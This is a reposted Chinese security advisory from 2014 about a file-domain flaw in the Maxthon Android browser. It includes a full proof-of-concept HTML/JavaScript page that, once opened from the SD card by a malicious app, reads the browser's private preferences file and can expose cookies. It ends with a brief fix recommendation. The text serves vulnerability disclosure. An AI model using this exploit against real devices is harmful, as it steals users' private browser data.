知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

傲游手机浏览器过滤不严谨导致信息泄露

发布时间:2014-07-15 11:50:29作者:知识屋

调用傲游打开一个获取内容的页面,在非root情况下,可获取傲游浏览器下的所有数据,包括cookie信息等,可以盗取发送给服务器
可以通过一个app释放一个攻击到sd卡上,然后该app打开傲游浏览器,执行这个文件html文件,路径为file:///mnt/sdcard/hehe.html。向傲游浏览器发送请求要求打开一个页面时,即可触发
 
hehe.html文件如下(如下是举例,还可以上传到服务器)
 
<html>

<body>

<script type="text/javascript">



function getRet() {

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

}

}



xmlhttp = request;

alert("ok");



//获取本地文件代码

xmlhttp.open("GET", "file:////data/data/com.mx.browser/shared_prefs/com.mx.browser_preferences.xml", false);



xmlhttp.send(null);

var ret = xmlhttp.responseText;

alert(ret);

}

getRet();

</script>

</body>

</html>

 

 
 
修复方案:
做file域做下限制,4.0 4.2 4.3下测试都可以
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜